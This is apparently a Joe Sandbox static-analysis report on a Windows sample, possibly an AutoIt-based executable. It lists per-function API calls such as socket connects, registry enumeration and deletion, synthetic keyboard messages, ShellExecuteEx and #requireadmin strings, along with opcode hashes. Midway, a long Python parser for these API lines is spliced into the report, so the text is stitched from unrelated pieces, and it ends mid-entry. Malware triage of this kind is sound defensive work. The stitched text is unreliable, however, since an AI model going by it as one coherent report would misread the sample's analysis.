                                                                                                                • API String ID: 3619996494-0
                                                                                                                • Opcode ID: 8fb73a105c42765c4d80542165c1c6be4a0f7a9dc2450a3d1e7858fd93b53635
                                                                                                                • Instruction ID: cb55c6b75316b5675f18e2a29a59240ea75f5c991aab3fbb7cd846095e4bc12c
                                                                                                                • Opcode Fuzzy Hash: 8fb73a105c42765c4d80542165c1c6be4a0f7a9dc2450a3d1e7858fd93b53635
                                                                                                                • Instruction Fuzzy Hash: 8F81C171208340ABC710EB2ADC92F6AB7B9EF85714F50492CF9559B2D2DB70ED04CB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8390296cb041c05873fe5fb3dd21d7b5461499518445138c4e0bb032c349af9f
                                                                                                                • Instruction ID: d37301355f613c0815c358f1517d286f82ffc158fbe7e5e2b45c87171e8592bb
                                                                                                                • Opcode Fuzzy Hash: 8390296cb041c05873fe5fb3dd21d7b5461499518445138c4e0bb032c349af9f
                                                                                                                • Instruction Fuzzy Hash: FE717930A04149EFCF14CF99CC48EBEBB7AFF86314F148149F915AA291D734AA51CBA4
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(01455560), ref: 0096B3EB
                                                                                                                • IsWindowEnabled.USER32(01455560), ref: 0096B3F7
                                                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0096B4DB
                                                                                                                • SendMessageW.USER32(01455560,000000B0,?,?), ref: 0096B512
                                                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 0096B54F
                                                                                                                • GetWindowLongW.USER32(01455560,000000EC), ref: 0096B571
                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0096B589
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 4072528602-0
                                                                                                                • Opcode ID: 760acd8ba8fda0a6ca87f7805bff26ca41876ef821adea4b3c7902d343508f66
                                                                                                                • Instruction ID: c4fcd37176bb647dc77c9e857b5fa6e11c60b9c5985c01c71857c8a266535b72
                                                                                                                • Opcode Fuzzy Hash: 760acd8ba8fda0a6ca87f7805bff26ca41876ef821adea4b3c7902d343508f66
                                                                                                                • Instruction Fuzzy Hash: AB719F34605204EFDB209F54C8A4FBA7BB9EF4A300F144469F956D73B2EB72A981DB50
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0095F448
                                                                                                                • _memset.LIBCMT ref: 0095F511
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0095F556
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                  • Part of subcall function 008FFC86: _wcscpy.LIBCMT ref: 008FFCA9
                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 0095F5CD
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0095F5FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3522835683-2766056989
                                                                                                                • Opcode ID: 018f3c884d8b832ab5e31f4767d6c8b77629c4357e8183340c871e09ed0299dc
                                                                                                                • Instruction ID: b6bd3e8c9b97f06c645bc390252453b41ad16621167aede36ba57a9cbf55aa5b
                                                                                                                • Opcode Fuzzy Hash: 018f3c884d8b832ab5e31f4767d6c8b77629c4357e8183340c871e09ed0299dc
                                                                                                                • Instruction Fuzzy Hash: C561AE71A006299FCB04EF69C4959AEBBF5FF49320F148069E859AB361CB70AD45CF81
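                                                                                                                 The per-function "APIs" lists in this report share one fixed line format: a bullet, an optional "Part of subcall function <addr>:" prefix, then "<name>.<MODULE>(<hex args>), ref: <call site>", with "?" for an argument the static analysis could not recover and "#<n>" for an import by ordinal (as in "#17.WSOCK32" above). The Python below is an added example for triaging such entries programmatically; it is not Joe Sandbox code and not part of the report. It parses the lines, resolves WSOCK32 ordinals to export names, annotates the window-message and virtual-key constants passed to PostMessageW/SendMessageW, and tags each function with a few coarse behaviour labels. The sample entries are constructed from lines on this page; the ordinal table, the constant tables and the triage tags are assumptions drawn from the Windows SDK headers and the wsock32.dll export table rather than from the report.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumption: classic wsock32.dll export ordinals (from the DLL's export
# table, not from the report). Joe Sandbox prints an import-by-ordinal
# as "#<ordinal>.<MODULE>".
WSOCK32_ORDINALS = {
    1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 9: "htons",
    13: "listen", 16: "recv", 17: "recvfrom", 19: "send", 20: "sendto",
    23: "socket",
}
# Assumption: constants from the Windows SDK headers (winuser.h / wingdi.h).
WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT", 0x00A1: "WM_NCLBUTTONDOWN", 0x00B0: "EM_GETSEL",
    0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN", 0x0105: "WM_SYSKEYUP", 0x0111: "WM_COMMAND",
}
KEY_MESSAGES = {0x0100, 0x0101, 0x0104, 0x0105}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                0x5B: "VK_LWIN", 0x5C: "VK_RWIN"}
DEVICE_CAPS = {0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"}
MESSAGE_APIS = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}

# One report line: "[• ][Part of subcall function X: ]name.MODULE[(args)], ref: addr"
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function\s+(?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]          # int for hex literals, None for "?"
    ref: int                           # call-site address in the dumped image
    subcall_of: Optional[int] = None   # address of the callee that makes the call
    notes: List[str] = field(default_factory=list)


def _parse_arg(token: str) -> Optional[int]:
    token = token.strip()
    return None if token in ("", "?") else int(token, 16)


def annotate(call: ApiCall) -> None:
    """Resolve ordinals and decode well-known constants in place."""
    if call.module == "WSOCK32" and call.name.startswith("#"):
        ordinal = int(call.name[1:])
        if ordinal in WSOCK32_ORDINALS:
            call.notes.append(f"ordinal {ordinal} = {WSOCK32_ORDINALS[ordinal]}")
            call.name = WSOCK32_ORDINALS[ordinal]
    if call.name in MESSAGE_APIS and len(call.args) >= 2:
        msg = call.args[1]
        if msg in WINDOW_MESSAGES:
            call.notes.append(WINDOW_MESSAGES[msg])
            if msg in KEY_MESSAGES and len(call.args) >= 3 and call.args[2] in VIRTUAL_KEYS:
                call.notes.append(VIRTUAL_KEYS[call.args[2]])
    if call.name == "GetDeviceCaps" and len(call.args) >= 2 and call.args[1] in DEVICE_CAPS:
        call.notes.append(DEVICE_CAPS[call.args[1]])


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = [] if m["args"] is None else [_parse_arg(t) for t in m["args"].split(",")]
    call = ApiCall(m["name"], m["module"].upper(), args, int(m["ref"], 16),
                   int(m["subfn"], 16) if m["subfn"] else None)
    annotate(call)
    return call


def parse_entry(text: str) -> List[ApiCall]:
    """Parse one function's APIs block; lines that are not API calls are skipped."""
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]


def triage(calls: List[ApiCall]) -> set:
    """Coarse behaviour tags for one function (assumed heuristics, not the
    sandbox's own signature logic)."""
    names = {c.name for c in calls}
    tags = set()
    if "SetKeyboardState" in names or any(
            n in c.notes for c in calls for n in ("WM_KEYDOWN", "WM_KEYUP")):
        tags.add("synthetic-keyboard-input")
    if names & {"socket", "connect", "recv", "recvfrom", "send", "sendto"}:
        tags.add("socket-io")
    if names & {"ShellExecuteExW", "ShellExecuteW", "CreateProcessW", "CreateProcessA"}:
        tags.add("process-launch")
    return tags


# Constructed sample input, copied from two APIs entries in this report.
SOCKET_ENTRY = """\
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00956C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00956C21
• WSAGetLastError.WSOCK32(00000000), ref: 00956C34
• htons.WSOCK32(?,?,?,00000000,?), ref: 00956CEA
  • Part of subcall function 0093A7E9: _strlen.LIBCMT ref: 0093A7F3
• _memmove.LIBCMT ref: 00956DAD
"""
KEYBOARD_ENTRY = """\
• GetKeyboardState.USER32(?), ref: 00940FA1
• SetKeyboardState.USER32(?), ref: 00941002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00941030
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 009410B8
"""

if __name__ == "__main__":
    for entry in (SOCKET_ENTRY, KEYBOARD_ENTRY):
        calls = parse_entry(entry)
        for c in calls:
            print(f"{c.ref:08X} {c.module}!{c.name} {' '.join(c.notes)}")
        print("tags:", sorted(triage(calls)))
```

                                                                                                                 The parser keeps the "ref:" address as an integer so results can be joined back to the "Memory Dump Source" offset (the image is based at 008E0000 here) or to an IDA database. Unresolved ordinals and unknown constants are left untouched rather than guessed, so an entry that the tables do not cover still parses, it simply carries no note.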
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00940F8C
                                                                                                                • GetKeyboardState.USER32(?), ref: 00940FA1
                                                                                                                • SetKeyboardState.USER32(?), ref: 00941002
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00941030
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0094104F
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00941095
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009410B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 4a09e1bc7490eb91863d0449832546b036327e3b6ee3b1444b120b835d448330
• Instruction ID: cd13ec3df736409f4d40d76e98e27232657ebbf7d90b1a0cd95c07f242487488
• Opcode Fuzzy Hash: 4a09e1bc7490eb91863d0449832546b036327e3b6ee3b1444b120b835d448330
• Instruction Fuzzy Hash: AC51D2A05187D53DFB3642348C15FBABFAD6B46304F088589E2D9868D3D2E9ECC8D751
APIs
• GetParent.USER32(00000000), ref: 00940DA5
• GetKeyboardState.USER32(?), ref: 00940DBA
• SetKeyboardState.USER32(?), ref: 00940E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00940E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00940E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00940EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00940EC9
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 5bb09243c8290f536e3ae02ce7e959325431bd230dbef8c8f40da3b8d1a14ce7
• Instruction ID: f7c0ecd98661e5bfb42d712e71e5088d4272a6a429c08fc9ac9f4211d021c6f7
• Opcode Fuzzy Hash: 5bb09243c8290f536e3ae02ce7e959325431bd230dbef8c8f40da3b8d1a14ce7
• Instruction Fuzzy Hash: 7151E5A09587D53DFB3283748C55F7A7EAD6B86300F08888DE2D5864C2D3A5AC98E750
APIs
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 63eaebfe57847a6e2eb347702f6ca684ad6f278837ab1ceadb17396f9301e886
• Instruction ID: 6969438adbf11074b8dfd9782f9c47d9e4120d8406020dff5b5778afb22f174c
• Opcode Fuzzy Hash: 63eaebfe57847a6e2eb347702f6ca684ad6f278837ab1ceadb17396f9301e886
• Instruction Fuzzy Hash: 1B41B476C102187ACB11EBF48C46ACFB7BC9F45310F518966F608E3262EA34A245C7E6
APIs
  • Part of subcall function 0094466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00943697,?), ref: 0094468B
  • Part of subcall function 0094466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00943697,?), ref: 009446A4
• lstrcmpiW.KERNEL32(?,?), ref: 009436B7
• _wcscmp.LIBCMT ref: 009436D3
• MoveFileW.KERNEL32(?,?), ref: 009436EB
• _wcscat.LIBCMT ref: 00943733
• SHFileOperationW.SHELL32(?), ref: 0094379F
Strings
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: 5101b8fe4ca17e235a82465e5aee788ba8b8f371adc063d4735f3df3e95eabe6
• Instruction ID: 190a65badbd01656007b97f7b1bdaa2875c2527bc6a57d5015b18c327412fb25
• Opcode Fuzzy Hash: 5101b8fe4ca17e235a82465e5aee788ba8b8f371adc063d4735f3df3e95eabe6
• Instruction Fuzzy Hash: F6417E71508345AEC751EF64D456EDFB7ECAF89380F00492EF49AC3291EA34D689CB52
APIs
• _memset.LIBCMT ref: 009672AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00967351
• IsMenu.USER32(?), ref: 00967369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009673B1
• DrawMenuBar.USER32 ref: 009673C4
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: 0bfcc1bcd78621588c4afc3445c6f665280e341af9ec0abd4745ce2847814938
• Instruction ID: b7edce6b50b420413bf96d1fcec0c6f33bb06f5308c014ed59c27f5248e61b54
• Opcode Fuzzy Hash: 0bfcc1bcd78621588c4afc3445c6f665280e341af9ec0abd4745ce2847814938
• Instruction Fuzzy Hash: 39411675A04208EFDB20DF94E885EAABBF8FB05318F149529FD15A7350D770AD50EB90
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00960FD4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00960FFE
• FreeLibrary.KERNEL32(00000000), ref: 009610B5
  • Part of subcall function 00960FA5: RegCloseKey.ADVAPI32(?), ref: 0096101B
  • Part of subcall function 00960FA5: FreeLibrary.KERNEL32(?), ref: 0096106D
  • Part of subcall function 00960FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00961090
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00961058
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: e929079c1aa026d35fb2e1a876b9164bf3c6c0b224b1c66d7cad9477cf2b1ae5
• Instruction ID: 553266992d1d6590ee19d759382310cfdc4d8f6cace962c8936b93288d45987f
• Opcode Fuzzy Hash: e929079c1aa026d35fb2e1a876b9164bf3c6c0b224b1c66d7cad9477cf2b1ae5
• Instruction Fuzzy Hash: BA312B71914109BFDF15DF90EC99EFFB7BCEF09340F04016AE501A2141EB749E899AA0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009662EC
• GetWindowLongW.USER32(01455560,000000F0), ref: 0096631F
• GetWindowLongW.USER32(01455560,000000F0), ref: 00966354
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00966386
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009663B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 009663C1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009663DB
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 9fac87239022ee4e57f92024bc25a8d94d4219061c4afbc279524f776490449f
• Instruction ID: 829880291541ebe6e9155c987bbd0fbcd0707e81f677dcabfeb00c7fc575f065
• Opcode Fuzzy Hash: 9fac87239022ee4e57f92024bc25a8d94d4219061c4afbc279524f776490449f
• Instruction Fuzzy Hash: 2231F030658255AFDB20CF18EC98F593BE9FB4A714F1901A8F551DF2B2CB71A840EB91
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093DB2E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093DB54
• SysAllocString.OLEAUT32(00000000), ref: 0093DB57
• SysAllocString.OLEAUT32(?), ref: 0093DB75
• SysFreeString.OLEAUT32(?), ref: 0093DB7E
• StringFromGUID2.OLE32(?,?,00000028), ref: 0093DBA3
• SysAllocString.OLEAUT32(?), ref: 0093DBB1
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: 7019838562aa49e040cb862b54ae916205aed40363bc0a7944d33993c5a0a18d
                                                                                                                • Instruction ID: 97eb542b960a23c277de0543dae9434ca4c069e7a1e46eff4f417d93ae18dd8b
                                                                                                                • Opcode Fuzzy Hash: 7019838562aa49e040cb862b54ae916205aed40363bc0a7944d33993c5a0a18d
                                                                                                                • Instruction Fuzzy Hash: B0219472605219AFDB10DFA8EC58DBBB3ECEB09360B018529F914DB160D6709C419B60
APIs
  • Part of subcall function 00957D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00957DB6
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009561C6
• WSAGetLastError.WSOCK32(00000000), ref: 009561D5
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0095620E
• connect.WSOCK32(00000000,?,00000010), ref: 00956217
• WSAGetLastError.WSOCK32 ref: 00956221
• closesocket.WSOCK32(00000000), ref: 0095624A
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00956263
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: b789efee8d1d2cd690b89a217f7b9c730a93eb8b6760a12938586aaab911fe0e
• Instruction ID: fb86ca3e556adbbebb36f1fb3b65f1bcf391d8c90b07f6544d2945998b02d2e4
• Opcode Fuzzy Hash: b789efee8d1d2cd690b89a217f7b9c730a93eb8b6760a12938586aaab911fe0e
• Instruction Fuzzy Hash: 4831D031604118ABDF10EF25DC85BBA7BACEB45361F004069FD05E7291CBB0AC089BA2
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 8e1ac3de5ead02f7428365abc30845cdcc61b0fdd9be36e864367375b75f0ea7
• Instruction ID: 6edd8369c0c9664722263926cd9ed9c9a83cf8452d9b7a30451137415b2d0360
• Opcode Fuzzy Hash: 8e1ac3de5ead02f7428365abc30845cdcc61b0fdd9be36e864367375b75f0ea7
• Instruction Fuzzy Hash: 4C217673A046116AC630AB34EC23FBB739CEF95348F10843AF84A86091EB549D42C695
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093DC09
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093DC2F
• SysAllocString.OLEAUT32(00000000), ref: 0093DC32
• SysAllocString.OLEAUT32 ref: 0093DC53
• SysFreeString.OLEAUT32 ref: 0093DC5C
• StringFromGUID2.OLE32(?,?,00000028), ref: 0093DC76
• SysAllocString.OLEAUT32(?), ref: 0093DC84
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 253af358c2d1112ce225f767be95c6f6a80591487df450133ffca2b3092d8aa7
• Instruction ID: d1281feb0fb740064a489aa4d2fa79778d3af56961f404576c0237aeac4a24f0
• Opcode Fuzzy Hash: 253af358c2d1112ce225f767be95c6f6a80591487df450133ffca2b3092d8aa7
• Instruction Fuzzy Hash: 06218335619204AFDB10DFB8EC98DAB77ECEB49360F108129F954CB2A0DAB4DD41DB64
APIs
  • Part of subcall function 008E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008E1D73
  • Part of subcall function 008E1D35: GetStockObject.GDI32(00000011), ref: 008E1D87
  • Part of subcall function 008E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E1D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00967632
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0096763F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0096764A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00967659
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00967665
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 46c90b717348586c0d0ae5f5a709c9a759c9d9d5abb18bf0bbadc3973863b4dd
• Instruction ID: 5dd5de941cb64dbd03c64e673c346763539b4bc3387b052ab910deafb978c85d
• Opcode Fuzzy Hash: 46c90b717348586c0d0ae5f5a709c9a759c9d9d5abb18bf0bbadc3973863b4dd
• Instruction Fuzzy Hash: 3711B6B1114219BFEF118F64CC85EE7BF5DEF08798F014114B604A2060C6729C21DBA4
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00903F85), ref: 00904085
• GetProcAddress.KERNEL32(00000000), ref: 0090408C
• EncodePointer.KERNEL32(00000000), ref: 00904097
• DecodePointer.KERNEL32(00903F85), ref: 009040B2
Strings
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: ba2830676e231eea7d55547d3a0d8da0cc542d6db03c3da944222afa6000658d
• Instruction ID: 296d99aeb1a6ac93218b867dad64aa81b3fe1358221ba5daf5467b4c6d0150cb
• Opcode Fuzzy Hash: ba2830676e231eea7d55547d3a0d8da0cc542d6db03c3da944222afa6000658d
• Instruction Fuzzy Hash: 35E0BF7167D300DFEB209F61FD1DB157AA5BB0578AF208029F111E51E0CBB64604EB54
APIs
• GetClientRect.USER32(?,?), ref: 008E1DDC
• GetWindowRect.USER32(?,?), ref: 008E1E1D
• ScreenToClient.USER32(?,?), ref: 008E1E45
• GetClientRect.USER32(?,?), ref: 008E1F74
• GetWindowRect.USER32(?,?), ref: 008E1F8D
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 2f110d3d3937c5302ff61326dde6e8689a04eda0a007c911a55463dbd8387500
• Instruction ID: 7731686f7202167ca6c7374008696e5f0237fc52e8af992ced636187618b422e
• Opcode Fuzzy Hash: 2f110d3d3937c5302ff61326dde6e8689a04eda0a007c911a55463dbd8387500
• Instruction Fuzzy Hash: 93B14879A0028ADBDF10CFA9C5847EEB7B1FF09314F149129EC59EB254DB70AA40CB94
APIs
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: 64054722508a541f7d4bdc1b16eea9670213e6d5314917a8f727005dfdec98dc
• Instruction ID: ddc008b71a6fe03fbcc7035e8db904e148e48371feb87f5e4bab7a8678b06d39
• Opcode Fuzzy Hash: 64054722508a541f7d4bdc1b16eea9670213e6d5314917a8f727005dfdec98dc
• Instruction Fuzzy Hash: 9B619D7050029A9BCF01EF65CC81FFE37A9FF86308F054929F999AB192DB749805CB52
APIs
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
  • Part of subcall function 00960E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009602BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009602FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00960320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00960349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096038C
• RegCloseKey.ADVAPI32(00000000), ref: 00960399
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046560759-0
                                                                                                                • Opcode ID: ba21c1e414529cbf8110bb62511079d5ba15c85f74e10a894f619b6df0c8b2b4
                                                                                                                • Instruction ID: 3c1a2770c0578e30ffaa2dc286acb4d66444443924872714e798db4ec7ce08a0
                                                                                                                • Opcode Fuzzy Hash: ba21c1e414529cbf8110bb62511079d5ba15c85f74e10a894f619b6df0c8b2b4
                                                                                                                • Instruction Fuzzy Hash: 90515831208240AFC704EF68D895EAFBBE9FF85314F04492DF5958B2A2DB71E905DB52
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(?), ref: 009657FB
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00965832
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0096585A
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 009658C9
                                                                                                                • GetSubMenu.USER32(?,?), ref: 009658D7
                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00965928
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
